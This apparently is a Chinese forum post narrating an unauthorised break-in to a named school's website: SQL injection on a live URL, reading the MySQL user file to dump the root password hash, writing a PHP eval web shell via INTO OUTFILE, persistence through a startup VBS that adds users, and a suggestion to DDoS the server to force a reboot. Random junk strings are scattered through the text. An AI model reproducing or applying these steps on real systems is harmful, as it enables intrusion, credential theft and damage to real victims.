友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
0 R- {# S# g% _; ^发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

5 h. ^) h- j% x! c

常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
* p; n+ \) b  l! {9 z! u
# j. s2 y7 B' _那么想可以直接写入shell ，getshell有几个条件：
9 l% y+ L0 A9 n

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
9 Q& S1 t$ s: @; z# n9 X
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
2 ~' ~5 J- L, [# W- H- Y3./load_file()  
2 r+ o$ \3 o% c+ [7 T* _& q4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
  G! ?* M' u5 Y" |5./phpmyadmin/libraries/select_lang.lib.php  
' J2 @( }! a: c  U# a6 ]( `6./phpmyadmin/libraries/lect_lang.lib.php  
* H2 F: h& T! `1 B# {6 x1 ?$ a8 A: H7./phpmyadmin/libraries/mcrypt.lib.php   
% a% C& j8 Q7 @8 b8./phpmyadmin/libraries/export/xls.php  
/ I- u8 K" L8 L5 X# Z( D% n+ c
均不行...........................
; I$ ~2 c1 V5 n5 F/ ^& N$ L* G4 l5 _
5 I* ^1 ~: d. E- H+ `御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

* e2 I) F" D: s* C: H$ _( Y敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
/ i9 ~3 P! G% b& I$ @$ H$ N
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
$ G7 y- Y0 ?% u
, \" X3 n3 \0 \6 z# K8 t自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
% ]  i( O7 ~. |* K' z
成功读到root密码：

; v) u* B, E5 b( @* u0 N7 g17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
6 {" A, |& F2 @: Z: r22---- 8(0038)
2 F0 j" |) c0 Y, w23---- 2(0032)
24---- E(0045)
25---- 1(0031)
9 J0 [8 T1 Q$ @& h& V- w4 v26---- C(0043)
27---- 5(0035)
7 S4 Y2 O& }3 L% w28---- 8(0038)
7 T# a3 N2 T/ r6 T+ @29---- 2(0032)
30---- 8(0038)
31---- A(0041)
32---- 9(0039)
% {! n0 x  T1 H8 }! r9 B7 X33---- B(0042)
9 j* L3 a" P5 Q8 A$ z  j34---- 5(0035)
35---- 4(0034)
+ \# A7 O% l* H: f6 [36---- 8(0038)
- d1 J1 u% }9 i) Z# f37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
/ L  I" X4 N) R" X, z5 w. C) U" F40---- 1(0031)
. E& J, k- `- ~8 B41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
2 @; R- E# j3 H! B; z44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
48---- F(0046)
/ l- {$ W/ F6 v2 d) q49---- 4(0034)
50---- F(0046)
/ b6 k) T) D. G( m51---- 0(0030)
, w/ }7 B7 ]. A, b8 `; X52---- 3(0033)
53---- 2(0032)
# r& Y7 W  X; H7 Y. N  P8 c54---- A(0041)
55---- 4(0034)
8 w4 {; L% `! L* V56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
60---- *(0041)
61---- *0032)
- b8 K) Z) `' s% X1 W+ P7 X6 N
解密后成功登陆phpmyamin
                          

& u$ j, j6 W2 U# Y7 T  h; P                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：
/ E/ S+ A  B! U) a' j
, l# i3 d& @! M6 v( ]6 d服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

" W3 [) x) p# S

成员

" N# l+ s- m4 Z' K. t+ [

-------------------------------------------------------------------------------
/ _1 k( ^! o( H- k7 A7 h5 F4 ^admin
! n! d2 T% _. s, h/ _Administrator
# h4 o6 a( I. O- s2 l( Oslipper$
0 \' N# B, D- _" F3 }& zsqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
: I& Y$ g7 i4 p: v
; }+ B: ]' X, oddos服务器重启，不然就只能坐等服务器重启了...............................

( P5 v2 O" W9 e& t4 g" a6 f, f# E